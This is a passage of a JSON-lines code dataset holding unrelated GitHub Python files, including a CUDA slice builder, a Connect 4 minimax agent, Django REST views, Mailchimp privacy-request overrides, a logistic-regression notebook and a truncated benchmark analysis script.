pdf_path = os.path.join(self.folder_path, file)\n result.append(pdf_path)\n return result\n\n def __get_pdf_analytics(self) -> list:\n result = list()\n for pdf_path in self.__get_pdf_files():\n pa = PdfAnalytics(pdf_path)\n result.append(pa)\n return result\n\n def __dc_tag(self, tag: str) -> str:\n return f'{{{self.DC_NS[\"dc\"]}}}{tag}'\n\n def __get_tag_values(self, pdf: PdfAnalytics) -> dict:\n return {\n 'contributor': pdf.contributor(),\n 'coverage': pdf.coverage(),\n 'creator': pdf.creator(),\n 'date': pdf.date(),\n 'description': pdf.description(),\n 'format': pdf.format_(),\n 'identifier': pdf.identifier(),\n 'language': pdf.language(),\n 'publisher': pdf.publisher(),\n 'relation': pdf.relation(),\n 'rights': pdf.rights(),\n 'source': pdf.source(),\n 'subject': pdf.subject(),\n 'title': pdf.title(),\n 'type': pdf.type_()\n }\n\n def __analytics_to_xml(self, pdf: PdfAnalytics) -> etree.Element:\n pdf_tree = etree.Element('paper', attrib={'filename': pdf.filename})\n pdf_tree.set('pages', str(pdf.page_count()))\n pdf_tree.set('tables', str(pdf.table_count()))\n pdf_tree.set('figures', str(pdf.figure_count()))\n tag_values = self.__get_tag_values(pdf)\n for tag in tag_values:\n for value in tag_values[tag]:\n element = etree.SubElement(pdf_tree, self.__dc_tag(tag))\n element.text = value\n return pdf_tree\n\n def __xml(self) -> etree.ElementTree:\n root = etree.Element('metadata')\n for pdf in self.analytics:\n pdf_xml = self.__analytics_to_xml(pdf)\n root.append(pdf_xml)\n tree = etree.ElementTree(root)\n etree.indent(tree, space=\"\\t\", level=0)\n return tree\n","repo_name":"joseamdev/tfg","sub_path":"src/pdf_folder.py","file_name":"pdf_folder.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25096916484","text":"from typing import List\nimport logging\nimport numpy as np\n\ntry:\n import cupy as cp\nexcept ImportError:\n raise ImportError(\"the module require cupy\")\n\ntry:\n from .cuda_ext import slice_kernel_cuda\nexcept ImportError:\n raise ImportError(\"cuda extension cannot be found. Compile it first\")\n\nfrom .slice_builder_base import OneSliceBuilderBase, MultiSlicesBuilderBase\nfrom ..physics import water_num_dens\n\n\nlogger = logging.getLogger(__name__)\n\ncupy_mempool = cp.get_default_memory_pool()\n\n\nclass OneSliceBuilder(OneSliceBuilderBase):\n def __init__(self, unique_elements: List[int], \n n1: int, n2: int,\n d1: float, d2: float):\n logger.debug(\"using cuda OneSliceBuilder\")\n super(OneSliceBuilder, self).__init__(unique_elements, n1, n2, d1, d2)\n scattering_factors = cp.asarray(self.scattering_factors, dtype=cp.float32)\n self.backend = slice_kernel_cuda.OneSliceBuilder(scattering_factors, n1, n2, d1, d2)\n\n def bin_atoms_one_slice(self, atom_coordinates_sorted_by_elems, unique_elements_count):\n elems_count_gpu = cp.asarray(unique_elements_count, dtype=cp.uint32)\n atom_coords_gpu = cp.asarray(atom_coordinates_sorted_by_elems, dtype=cp.float32)\n atmv_gpu = self.backend.bin_atoms_one_slice(atom_coords_gpu, elems_count_gpu)\n return atmv_gpu\n\n def make_one_slice(self, atom_histograms_one_slice_gpu, symmetric_bandlimit: bool = True):\n aslice_gpu = self.backend.make_one_slice(atom_histograms_one_slice_gpu)\n if symmetric_bandlimit:\n aslice_gpu = _symmetric_bandlimit_real_cupy(aslice_gpu)\n cp.clip(aslice_gpu, a_min=1e-13, a_max=None, out=aslice_gpu)\n return aslice_gpu\n\n\nclass MultiSlicesBuilder(MultiSlicesBuilderBase):\n def __init__(self, unique_elements: List[int],\n n_slices: int, n1: int, n2: int,\n dz: float, d1: float, d2: float):\n logger.debug(\"using cuda MultiSlicesBuilder\")\n logger.debug(f\"cupy mempool limit: {cupy_mempool.get_limit()/1024**2:.2f}MB\")\n super(MultiSlicesBuilder, self).__init__(unique_elements, n_slices, n1, n2, dz, d1, d2)\n scattering_factors = cp.asarray(self.scattering_factors, dtype=cp.float32)\n self.backend = slice_kernel_cuda.MultiSlicesBuilder(scattering_factors, n_slices, n1, n2, dz, d1, d2)\n\n def bin_atoms_multi_slices(self, atom_coordinates_sorted_by_elems, unique_elements_count):\n elems_count_gpu = cp.asarray(unique_elements_count, dtype=cp.uint32)\n atom_coords_gpu = cp.asarray(atom_coordinates_sorted_by_elems, dtype=cp.float32)\n atmv_gpu = self.backend.bin_atoms_multi_slices(atom_coords_gpu, elems_count_gpu)\n return atmv_gpu\n\n def make_multi_slices(self, atom_histograms, symmetric_bandlimit: bool = True):\n slices_gpu = self.backend.make_multi_slices(atom_histograms)\n logger.debug(\"cupy allocated: {:.2f}MB\".format(cupy_mempool.total_bytes()/1024**2))\n logger.debug(\"cupy used total: {:.2f}MB\".format(cupy_mempool.used_bytes()/1024**2))\n if symmetric_bandlimit:\n slices_gpu = _symmetric_bandlimit_real_cupy(slices_gpu)\n cp.clip(slices_gpu, a_min=1e-13, a_max=None, out=slices_gpu)\n return slices_gpu\n\n def add_water(self, atom_histograms_gpu):\n vacs = cp.prod(cp.where(atom_histograms_gpu == 0, True, False), axis=0)\n # average number of water molecules in a voxel\n vox_wat_num = water_num_dens * self.d1 * self.d2 * self.dz\n box = (self.n_slice, self.n1, self.n2)\n\n oxygens = cp.where(vacs, cp.random.poisson(vox_wat_num, box), 0).astype(cp.int)\n hydrogens = cp.where(vacs, cp.random.poisson(vox_wat_num * 2, box), 0).astype(cp.int)\n\n unique_elements_list = list(self.unique_elements)\n for z, hist in [(1, hydrogens), (8, oxygens)]:\n idx = unique_elements_list.index(z)\n atom_histograms_gpu[idx] += hist\n return atom_histograms_gpu\n\n\ndef _symmetric_bandlimit_real_cupy(arr):\n # return arr\n # arr (n0, n1, n2)\n n1, n2 = arr.shape[-2:]\n r = min(n1, n2) // 2\n kx, ky = cp.meshgrid(cp.arange(-n1//2, -n1//2 + n1), cp.arange(-n2//2, -n2//2 + n2))\n k2 = kx**2 + ky**2\n fil = cp.where(k2 <= r**2, 1., 0.)\n fil = cp.fft.ifftshift(fil).astype(cp.float32) # (n1, n2)\n ft = cp.fft.rfft2(arr, axes=(-2,-1), s=(n1, n2))\n ret = cp.fft.irfft2(ft * fil[:, :n2//2+1], s=(n1, n2)) # (n0, n1, n2)\n return ret\n \n","repo_name":"Varato/emsim","sub_path":"emsim/backend/slice_builder_cuda.py","file_name":"slice_builder_cuda.py","file_ext":"py","file_size_in_byte":4475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8280914171","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"create file hash\"\"\"\n\nimport argparse\nimport hashlib\nimport math\nimport os\nimport sys\nimport progressbar\n\nSUPPORTED_TYPES = ['md5', 'sha1', 'sha224', 'sha256', 'sha384', 'sha512']\n\n\ndef parse_args():\n \"command line arguments\"\n parser = argparse.ArgumentParser(\n description='create file hash',\n )\n parser.add_argument('file', action=\"store\", type=str,\n help=\"input file\")\n\n parser.add_argument('-t', action=\"store\", type=str,\n dest='type', default='md5', choices=SUPPORTED_TYPES, help=\"hash type\")\n\n parser.add_argument('--noprogress', action=\"store_true\",\n dest='no_progress', help=\"hide progressbar\")\n\n options = parser.parse_args()\n\n return options\n\n\ndef create_hash(target_file, hash_type, no_progress):\n \"create hash with file and type\"\n\n target_file = os.path.realpath(target_file)\n if not os.path.isfile(target_file):\n print(\"{0} is not a valid file\".format(target_file))\n sys.exit(2)\n\n hash_func = getattr(hashlib, hash_type)\n hash_value = hash_func()\n\n buff_size = 65536\n\n file_size = os.path.getsize(target_file)\n loop_count = math.ceil(file_size / buff_size)\n\n with open(target_file, 'rb') as file_to_hash:\n if (not no_progress) and loop_count > 64:\n progress_bar = progressbar.ProgressBar()\n\n for _ in progress_bar(range(loop_count)):\n data = file_to_hash.read(buff_size)\n hash_value.update(data)\n else:\n data = file_to_hash.read()\n hash_value.update(data)\n\n hash_value = hash_value.hexdigest()\n return hash_value\n\n\nif __name__ == \"__main__\":\n OPTIONS = parse_args()\n print(create_hash(OPTIONS.file, OPTIONS.type, OPTIONS.no_progress))\n","repo_name":"ttchengcheng/pycmd","sub_path":"filehash.py","file_name":"filehash.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18230710381","text":"from models import *\nfrom rs3_api_constants import item_categories\nfrom utilities import log_manager\n\nlog = log_manager.get_logger('RS3ItemIds.db_manager')\n\"\"\"Logger object specific to db_manager.\"\"\"\n\nMODELS = [Category, ItemPage, Item]\n\n__all__ = [\n 'create_tables',\n 'populate_item_categories'\n]\n\n\ndef create_tables():\n \"\"\"Creates database tables for each model if they do not already exist.\"\"\"\n db.connect()\n db.create_tables(MODELS)\n db.close()\n\n\ndef populate_item_categories():\n \"\"\"Inserts categories generated from the categories dictionary in rs3_api_constants.py\"\"\"\n categories = [Category(id=category_id, name=name) for category_id, name in item_categories.items()]\n Category.bulk_create(categories)\n\n\nif __name__ == \"__main__\":\n create_tables()\n populate_item_categories()\n","repo_name":"shanecb/RS3-Item-IDs","sub_path":"db_manager.py","file_name":"db_manager.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"17680287959","text":"import operator\n\n#drops a token in the specified column, returns a tuple of (the game board after the drop, if the drop was successful)\ndef didDropToken(column, game_board, empty_num, my_player_num):\n if (game_board[0][column] != empty_num): #if the top spot is already occupied\n return game_board, False #we can't move here\n else:\n row = 1 #go to the next spot\n while row < len(game_board) - 1: #while we're stil on the board\n if (game_board[row][column] == empty_num): #if the spot is empty\n row += 1 #account for gravity\n if (game_board[row][column] != empty_num): #otherwise there's a piece here\n game_board[row - 1][column] = my_player_num #our token will land on top\n return game_board, True #it dropped!\n game_board[row][column] = my_player_num #we're at the bottom of the board\n return game_board, True #the token landed\n\ndef tryDropAndScore(column, game_board, empty_num, player_num):\n copy_game_board = [row[:] for row in game_board] #need a deep copy here\n dropAttempt = didDropToken(column, copy_game_board, empty_num, player_num) #try dropping a token \n if (dropAttempt[1] == True): #if it worked\n score = evaluate(dropAttempt[0], player_num) #evaluate it\n return (score, dropAttempt[0]) #(the score after the drop, the game board after the drop)\n else: #if it didn't work\n score = -1000 #give it a low score\n return (score, dropAttempt[0]) #(the score after the drop, the game board after the drop)\n\ndef miniMax (game_board, empty_num, my_player_num):\n move_set = []\n scored_move_set = []\n min_max_flipper = 2\n opponent_num = getOpponentNum(my_player_num)\n cols = len(game_board[0])\n\n #generate the moveset\n for a in range(cols): #my first move\n for b in range(cols): #their move\n for c in range(cols): #my move\n move_set.append((a, b, c)) #including base state, this is a 4-ply moveset\n\n #for every combination, loop through the columns\n for move in move_set: \n current_board = game_board #reset the game board to the current state\n my_scored_moves = []\n for token_drop in move:\n if (min_max_flipper % 2 == 0): # if it's my turn\n drop = tryDropAndScore(token_drop, current_board, empty_num, my_player_num) #drop my piece and score it\n my_scored_moves.append((drop[0], token_drop))\n else: #if it's their turn\n drop = tryDropAndScore(token_drop, current_board, empty_num, opponent_num) #drop their piece and score it\n my_scored_moves.append((drop[0], token_drop))\n current_board = drop[1] #keep this move's board intact\n min_max_flipper += 1 #it's the next player's turn\n scored_move_set.append(my_scored_moves) #put this move set into the list of scored move sets\n\n best_moves = max_eval(scored_move_set, 2, 1)\n best_moves1 = min_eval(best_moves, 1, 1)\n best_moves2 = max_eval(best_moves1, 0, 1)\n\n return best_moves2[0][0][1]\n\ndef max_eval(scored_move_set, which_tuple, which_value):\n cols_to_check = []\n for x in scored_move_set: \n if x[which_tuple][which_value] not in cols_to_check: \n cols_to_check.append(x[which_tuple][which_value])\n\n best_moves = []\n for col in cols_to_check:\n moves_this_col = [t for t in scored_move_set if t[which_tuple][which_value] == col] #all of the moves for this column in this ply\n moves_this_col.sort(key = operator.itemgetter(which_tuple), reverse = True) #sort them (MAX)\n best_moves.append(moves_this_col[0]) #grab the best and append it to the best moves\n return best_moves\n\ndef min_eval(scored_move_set, which_tuple, which_value):\n cols_to_check = []\n for x in scored_move_set: \n if x[which_tuple][which_value] not in cols_to_check: \n cols_to_check.append(x[which_tuple][which_value])\n\n best_moves = []\n for col in cols_to_check:\n moves_this_col = [t for t in scored_move_set if t[which_tuple][which_value] == col] #all of the moves for this column in this ply\n moves_this_col.sort(key = operator.itemgetter(which_tuple)) #sort them (MIN)\n best_moves.append(moves_this_col[0]) #grab the best and append it to the best moves\n return best_moves\n\n#opponent will always be opposite of me, tell me what that is (1 or 2)\ndef getOpponentNum(my_player_num):\n if (my_player_num == 1):\n opponent_num = 2\n else: \n opponent_num = 1\n return opponent_num\n\n#give me a score for this state of the board\ndef evaluate(game_board, my_player_num):\n connect = 4 #we are trying to connect this many\n empty_num = 0 #this is the symbol representing an empty space\n opponent_num = getOpponentNum(my_player_num)\n\n # coords are a (row, column) tuple - 0 based\n my_player_coords = [] \n opponent_coords = []\n\n for row in range(len(game_board)): #for all the rows\n for col in range(len(game_board[row])): #and all the columns\n if (game_board[row][col] == my_player_num): #if the current spot has my player \n my_player_coords.append((row, col)) #add it to my coordinate list\n elif (game_board[row][col] == opponent_num): #if the current spot has the opponent\n opponent_coords.append((row, col)) #add it to the opponent's list\n \n my_score = playerScore(my_player_coords, my_player_num, game_board, connect, empty_num) #test my score\n opponent_score = playerScore(opponent_coords, opponent_num, game_board, connect, empty_num) #test opponent's score\n score = my_score - opponent_score #more positive means better for me\n return score\n\n#take all of the coords and check out three in either direction. Gets a point if empty. Gets 2 if filled with player of same type. Stops if finds opponent.\ndef playerScore(player_coords, player_num, game_board, connect, empty_num):\n score = 0 \n for coord in player_coords: #for all of the coords in the list\n row = int(coord[0])\n col = int(coord[1])\n #check up, down, right, left\n #check down\n for step in range(row + 1, row + connect):\n test_result = coordScore(game_board, step, col, empty_num, player_num)\n score += test_result[0]\n if (test_result[1] == False):\n break\n #check up \n for step in range(row - 1, row - connect, -1):\n test_result = coordScore(game_board, step, col, empty_num, player_num)\n score += test_result[0]\n if (test_result[1] == False):\n break\n #check right\n for step in range(col + 1, col + connect):\n test_result = coordScore(game_board, row, step, empty_num, player_num)\n score += test_result[0]\n if (test_result[1] == False):\n break\n #check left\n for step in range(col - 1, col - connect, -1):\n test_result = coordScore(game_board, row, step, empty_num, player_num)\n score += test_result[0]\n if (test_result[1] == False):\n break\n\n #check diagonal directions \n check_row_diag = row + 1 #diag x value to check\n check_col_diag = col + 1 #diag y value to check\n while (check_row_diag <= row + connect and check_col_diag <= col + connect): #check diag down, right\n test_result = coordScore(game_board, check_row_diag, check_col_diag , empty_num, player_num)\n score += test_result[0]\n if (test_result[1] == False):\n break\n check_row_diag += 1\n check_col_diag += 1\n check_row_diag = row + 1 #diag x value to check\n check_col_diag = col - 1 #diag y value to check\n while (check_row_diag <= row + connect and check_col_diag >= col - connect): #check diag down, left\n test_result = coordScore(game_board, check_row_diag, check_col_diag , empty_num, player_num)\n score += test_result[0]\n if (test_result[1] == False):\n break\n check_row_diag += 1\n check_col_diag -= 1\n check_row_diag = row - 1 #diag x value to check\n check_col_diag = col + 1 #diag y value to check\n while (check_row_diag >= row - connect and check_col_diag <= col + connect): #check diag up, right\n test_result = coordScore(game_board, check_row_diag, check_col_diag , empty_num, player_num)\n score += test_result[0]\n if (test_result[1] == False):\n break\n check_row_diag -= 1\n check_col_diag += 1\n check_row_diag = row - 1 #diag x value to check\n check_col_diag = col - 1 #diag y value to check\n while (check_row_diag >= row - connect and check_col_diag >= col - connect): #check diag up, right\n test_result = coordScore(game_board, check_row_diag, check_col_diag , empty_num, player_num)\n score += test_result[0]\n if (test_result[1] == False):\n break\n check_row_diag -= 1\n check_col_diag -= 1\n return score\n\n#apply a score to checked coords\ndef coordScore (game_board, row, col, empty_num, my_player_num):\n row_count = len(game_board)\n col_count = len(game_board[0]) #assumes uniformity\n if(row > row_count - 1 or row < 0 or col > col_count - 1 or col < 0): #if these coords aren't in the bounds of the board\n return (0, False) #don't give any points and don't allow more calls\n if (game_board[row][col] == empty_num): #if the space is empty\n return (1, True) #give 1 point and allow more calls\n elif (game_board[row][col] == my_player_num): #if the space has my player\n return (3, True) #give 2 points and allow more calls\n else: #otherwise it's the other player\n return (0, False) #subtract 2 points and don't allow more calls\n\nif __name__ == '__main__':\n \n board3 = [[0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0],\n [0,0,0,0,0,1,0],\n [0,2,0,0,0,1,0]]\n\n print(miniMax(board3, 0, 1))","repo_name":"RubiconIII/Connect4Agent","sub_path":"connect4Agent.py","file_name":"connect4Agent.py","file_ext":"py","file_size_in_byte":10198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34624627478","text":"# 종만북 - 완전탐색 - 소풍 - 6.3 - 난이도 하\n\n# ===================== 주어지는 데이터 ====================\n'''\n3\n2 1\n0 1\n4 6\n0 1 1 2 2 3 3 0 0 2 1 3\n6 10 0 1 0 2 1 2 1 3 1 4 2 3 2 4 3 4 3 5 4 5\n'''\n# ===========================================================\ndef countCase(taken):\n firstFree = -1 # 남은 학생들중 첫번째 학생 (중복카운트 제거위한 방법\n\n for i in range(len(taken)):\n if taken[i] == False:\n firstFree = i\n break\n\n if firstFree == -1:\n return 1\n\n\n #finish = True\n #for i in taken:\n # if i == False:\n # finish = False\n # break\n #if finish:\n # print(\"one\")\n # return 1\n\n\n res = 0 # 정답개수\n\n for i in range(firstFree+1, len(taken)):\n if taken[i] is False and relations[firstFree][i]:\n taken[firstFree] = taken[i] = True\n res += countCase(taken)\n taken[firstFree] = taken[i] = False # 위에서 하위 문제로 taken 새로 줘서 재귀 했으니 새로운 재귀 위한 복귀\n\n #for i in range(len(taken)):\n # for j in range(len(taken)):\n # if not taken[i] and not taken[j] and relations[i][j]:\n # taken[i] = taken[j] = True\n # res += countCase(taken)\n # taken[i] = taken[j] = False\n return res\n\n\n\n# ==================== 결과 확인 코드 =========================\nfor N in range(int(input())):\n students, friends = map(int, input().split())\n case = list(map(int, input().split()))\n\n relations = []\n for i in range(students):\n relations.append([False]*students)\n\n for i in range(0, len(case), 2):\n relations[case[i]][case[i+1]] = True\n relations[case[i+1]][case[i]] = True\n\n print(countCase([False]*students)) # 짝지어진 학생 여부\n","repo_name":"hchayan/Data-Structure-and-Algorithms","sub_path":"(구)자료구조와 알고리즘/(구)Quizes/book/PICNIC.py","file_name":"PICNIC.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"1361908617","text":"from django.shortcuts import render\nfrom django.http import Http404\nfrom rest_framework import generics\nfrom .serializers import websiteSerializer, websiteUpdateSerializer\nfrom .models import Article, NewsWebsite\nfrom rest_framework.permissions import AllowAny\n# Create your views here.\n\n\nclass articleList(generics.ListAPIView):\n serializer_class = websiteSerializer\n\n def get_queryset(self):\n queryset = NewsWebsite.objects.all().order_by('-clicks')\n category = self.request.query_params.get('category', None)\n if category is not None:\n try:\n queryset = NewsWebsite.objects.filter(\n category__iexact=category).order_by('-clicks')\n except:\n raise Http404\n return queryset\n\n\nclass articleUpdate(generics.RetrieveUpdateAPIView):\n serializer_class = websiteUpdateSerializer\n queryset = NewsWebsite.objects.all()\n permission_classes = [AllowAny, ]\n","repo_name":"bartha611/contentAgg","sub_path":"scraper/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71720793846","text":"# Python3 program to sort an array of\n# numbers in range from 1 to n.\n\n# function for sort array\n#Input: [3, 3, 2, 1, 3, 2, 1]\n#Output: [1, 1, 2, 2, 3, 3, 3]\ndef sortNums(arr, n):\n for i in range(n):\n arr[i] = i + 1\n\narr = [3, 3, 2, 1, 3, 2, 1]\nn = len(arr)\nprint (sortNums(arr, n))\n# [1, 1, 2, 2, 3, 3, 3]\n\n\n# Driver code\n# if __name__ == '__main__':\n# arr = [10, 7, 9, 2, 8, 3, 5, 4, 6, 1]\n# n = len(arr)\n#\n# # for sort an array\n# sortit(arr, n)\n#\n# # for print all the element\n# # in sorted way\n# for i in range(n):\n# print(arr[i], end=\" \")\n\n # This code is contributed by\n# Shrikant13\n","repo_name":"dandraden/Python-Projects","sub_path":"project-01/Sorton.py","file_name":"Sorton.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"126041838","text":"from json import dumps\nfrom typing import Any, Dict, List\n\nimport pydash\n\nfrom fides.api.graph.traversal import TraversalNode\nfrom fides.api.models.policy import Policy\nfrom fides.api.models.privacy_request import PrivacyRequest\nfrom fides.api.schemas.saas.shared_schemas import HTTPMethod, SaaSRequestParams\nfrom fides.api.service.connectors.saas.authenticated_client import AuthenticatedClient\nfrom fides.api.service.saas_request.saas_request_override_factory import (\n SaaSRequestType,\n register,\n)\nfrom fides.api.util.collection_util import Row\n\n\n@register(\"mailchimp_messages_access\", [SaaSRequestType.READ])\ndef mailchimp_messages_access(\n client: AuthenticatedClient,\n node: TraversalNode,\n policy: Policy,\n privacy_request: PrivacyRequest,\n input_data: Dict[str, List[Any]],\n secrets: Dict[str, Any],\n) -> List[Row]:\n \"\"\"\n Equivalent SaaS config for the code in this function.\n\n Request params still need to be defined for endpoints with overrides.\n This is to provide the necessary reference and identity data as part\n of graph traversal. The resulting values are passed in as parameters\n so we don't need to define the data retrieval here.\n\n path: /3.0/conversations//messages\n request_params:\n - name: conversation_id\n type: path\n references:\n - dataset: mailchimp_instance\n field: conversations.id\n direction: from\n data_path: conversation_messages\n postprocessors:\n - strategy: filter\n configuration:\n field: from_email\n value:\n identity: email\n \"\"\"\n # gather request params\n conversation_ids = input_data.get(\"conversation_id\")\n\n # build and execute request for each input data value\n processed_data = []\n if conversation_ids:\n for conversation_id in conversation_ids:\n response = client.send(\n SaaSRequestParams(\n method=HTTPMethod.GET,\n path=f\"/3.0/conversations/{conversation_id}/messages\",\n )\n )\n\n # unwrap and post-process response\n response_data = pydash.get(response.json(), \"conversation_messages\")\n filtered_data = pydash.filter_(\n response_data,\n {\"from_email\": privacy_request.get_cached_identity_data().get(\"email\")},\n )\n\n # build up final result\n processed_data.extend(filtered_data)\n\n return processed_data\n\n\n@register(\"mailchimp_member_update\", [SaaSRequestType.UPDATE])\ndef mailchimp_member_update(\n client: AuthenticatedClient,\n param_values_per_row: List[Dict[str, Any]],\n policy: Policy,\n privacy_request: PrivacyRequest,\n secrets: Dict[str, Any],\n) -> int:\n rows_updated = 0\n # each update_params dict correspond to a record that needs to be updated\n for row_param_values in param_values_per_row:\n # get params to be used in update request\n list_id = row_param_values.get(\"list_id\")\n subscriber_hash = row_param_values.get(\"subscriber_hash\")\n\n # in this case, we can just put the masked object fields object\n # directly into the request body\n update_body = dumps(row_param_values[\"masked_object_fields\"])\n\n client.send(\n SaaSRequestParams(\n method=HTTPMethod.PUT,\n path=f\"/3.0/lists/{list_id}/members/{subscriber_hash}\",\n body=update_body,\n )\n )\n\n rows_updated += 1\n return rows_updated\n","repo_name":"ethyca/fides","sub_path":"src/fides/api/service/saas_request/override_implementations/mailchimp_request_overrides.py","file_name":"mailchimp_request_overrides.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","stars":302,"dataset":"github-code","pt":"76"} +{"seq_id":"39626981137","text":"import casadi as ca\n\nclass ToyCar():\n \"\"\"\n Toy Car Example \n \n 3 States: \n [x, y, psi]\n \n 2 Inputs:\n [v, psi_rate]\n \n \"\"\"\n def __init__(self):\n self.define_states()\n self.define_controls()\n \n def define_states(self):\n self.x = ca.SX.sym('x')\n self.y = ca.SX.sym('y')\n self.psi = ca.SX.sym('psi')\n \n self.states = ca.vertcat(\n self.x,\n self.y,\n self.psi\n )\n #column vector of 3 x 1\n self.n_states = self.states.size()[0] #is a column vector \n \n def define_controls(self):\n self.v_cmd = ca.SX.sym('v_cmd')\n self.psi_cmd = ca.SX.sym('psi_cmd')\n \n self.controls = ca.vertcat(\n self.v_cmd,\n self.psi_cmd\n )\n #column vector of 2 x 1\n self.n_controls = self.controls.size()[0] \n \n def set_state_space(self):\n #this is where I do the dynamics for state space\n self.x_dot = self.v_cmd * ca.cos(self.psi)\n self.y_dot = self.v_cmd * ca.sin(self.psi)\n self.psi_dot = self.psi_cmd\n \n self.z_dot = ca.vertcat(\n self.x_dot, self.y_dot, self.psi_dot \n )\n \n #ODE right hand side function\n self.function = ca.Function('f', \n [self.states, self.controls],\n [self.z_dot]\n ) ","repo_name":"jn89b/trajectory_planning","sub_path":"local_planner/mpc/src/StateModels/ToyCar.py","file_name":"ToyCar.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"74067294006","text":"class Solution:\n def merge(self, intervals: List[List[int]]) -> List[List[int]]:\n interval = sorted(intervals, key=lambda x: x[0])\n merged = [interval[0]]\n\n for i in interval:\n # Merging algorithm:\n # If the start of the current sorted interval is\n # lesser than the current furthest interval's end\n if i[0] <= merged[-1][-1]:\n merged[-1][-1] = max(merged[-1][-1], i[1])\n else:\n merged.append(i)\n\n return merged\n","repo_name":"Lei-Tin/Leetcode","sub_path":"Medium/#56 merge.py","file_name":"#56 merge.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"33517224348","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[4]:\n\n\nfrom sklearn.linear_model import LogisticRegression\nimport numpy as np\nimport pandas as pd\nfrom sklearn.datasets import fetch_olivetti_faces\nfofdata = fetch_olivetti_faces()\n\n\n# In[6]:\n\n\nfofdata.keys()\n\n\n# In[21]:\n\n\ndf = pd.DataFrame(fofdata['data'])\ndf['labels'] = fofdata['target']\nfrom sklearn.model_selection import train_test_split\nX_train,X_test,y_train,y_test = train_test_split(fofdata['data'], fofdata['target'], test_size = 0.2)\nlogreg = LogisticRegression()\nlogreg.fit(X_train,y_train)\nvals = logreg.predict(X_test)\nfrom sklearn.metrics import accuracy_score\naccuracy_score(y_test, vals)\n\n\n# In[31]:\n\n\n#With basic Logistic Regression, we were able to get a 96.25% accuracy\n#Lets now check recall and precision\nfrom sklearn.metrics import recall_score\nrecall_score(y_test, vals, average = 'macro', zero_division = 1)\n\n\n# In[33]:\n\n\nfrom sklearn.metrics import precision_score\nprecision_score(y_test, vals, average = 'macro')\n\n\n# In[35]:\n\n\nfrom sklearn.model_selection import RandomizedSearchCV\nparams = {\n 'penalty':['none','l2','l1','elasticnet'],\n 'dual':[True, False],\n 'tol':[1e-4, 1e-5,1e-6,1e-2],\n 'C':[0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1,1.1,1.2,1.3,1.4,1.5,1.6,1.7,1.8,1.9,2],\n 'max_iter':[100,150,200,50]\n}\nfrom sklearn.linear_model import LogisticRegression\nlogsolver = LogisticRegression(n_jobs=-1)\nmodel = RandomizedSearchCV(logsolver, params, cv = 5, n_iter = 12)\nmodel.fit(fofdata['data'], fofdata['target'])\n\n\n# In[37]:\n\n\nmodel.cv_results_\nmodel.best_estimator_\n\n\n# In[40]:\n\n\n# dfresult = pd.DataFrame(model.cv_results_)\n# dfresult\nmodel.best_score_ #This best score drew the original model from 96.25% to 96.5%\n\n\n# In[41]:\n\n\n#Now that we have these parameters, lets see if we can improve the score even more by gridsearching over the different solvers\nintermediatesolver = LogisticRegression(C=1.1, n_jobs = -1, tol = 1e-05)\nparameters = {\n 'solver':['newton-cg', 'sag','saga','lbgfs']\n}\nfrom sklearn.model_selection import GridSearchCV\ntesting = GridSearchCV(intermediatesolver, parameters, cv = 5)\ntesting.fit(fofdata['data'], fofdata['target'])\ntestdf = pd.DataFrame(testing.cv_results_)\n\n\n# In[42]:\n\n\ntestdf\n\n\n# In[43]:\n\n\n#We were able to get the best overall performance with newtoncg added onto our original best model for a 97.25% test score\n#So overall we were able to improve performance by a whopping 1.25%. \n#We found best parameters were newton cg as solver, n_jobs = -1, C= 1.1 tol = 1e-05 with 20% test split\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"KenNavarro730/ClassicalMLWork","sub_path":"LogisticRegression.py","file_name":"LogisticRegression.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27934506088","text":"'''\nAnalysis script for the benchmark results, comparing\nresults with voltage control enabled and disabled.\n'''\nimport json\nimport os\n\nimport sys\nfrom loguru import logger\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom pandas import DataFrame\n\nimport benchmark_2_example.benchmark_multi_energy_sim as benchmark_sim\nimport toolbox_analysis\n\nlogger.remove()\nlogger.add(\"results.log\", level=\"DEBUG\")\nlogger.add(sys.stderr, level=\"DEBUG\")\n\nSTART_TIME = '2019-02-01 00:00:00'\n\nPLOT_DICT = {\n 'tank temperatures': [\n 'temperature in °C',\n [\n 'StratifiedWaterStorageTank_0.T_cold',\n 'StratifiedWaterStorageTank_0.T_hot',\n 'StratifiedWaterStorageTank_0.T_avg',\n # 'StratifiedWaterStorageTank_0.T_ch_in',\n # 'StratifiedWaterStorageTank_0.T_dis_in',\n ]\n ],\n 'tank mass flow': [\n 'mass flow in kg/m^3',\n [\n 'StratifiedWaterStorageTank_0.mdot_ch_in',\n 'StratifiedWaterStorageTank_0.mdot_dis_in',\n 